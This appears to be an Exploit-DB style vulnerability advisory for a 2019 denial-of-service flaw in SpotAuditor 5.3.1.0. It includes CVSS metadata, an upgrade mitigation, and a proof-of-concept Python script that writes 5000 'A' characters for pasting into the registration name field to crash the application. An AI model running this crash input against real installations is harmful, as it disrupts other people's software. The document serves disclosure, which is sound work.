Vendor: SpotAuditor
By: Sanjana Shetty
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: SpotAuditor
Affected Version From: 5.3.1.0
Affected Version To: 5.3.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:nsauditor:spotauditor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2019

SpotAuditor 5.3.1.0 – Denial of Service

SpotAuditor 5.3.1.0 is vulnerable to a denial of service attack. Entering 5000 A's into the name field of the register functionality crashes the application.

Mitigation:

Upgrade to the latest version of SpotAuditor to fix this vulnerability.

Exploit-DB raw data:

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/


# <POC by Sanjana Shetty>
# Steps

[1] Install the SpotAuditor software

[2] Access the register functionality

[3] In the name field enter 5000 A's and press enter, this will crash the
application.

==== use below script to create 5000 A's to a text file and copy it to the name field============


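print("# POC by sanjana shetty")

try:
    # Write 5000 'A' characters (0x41) to file.txt; the file is closed on exit
    with open("file.txt", "w") as f:
        junk = "\x41" * 5000
        f.write(junk)
    print("done")

except Exception as e:
    # Report any file I/O failure
    print("#error - " + str(e))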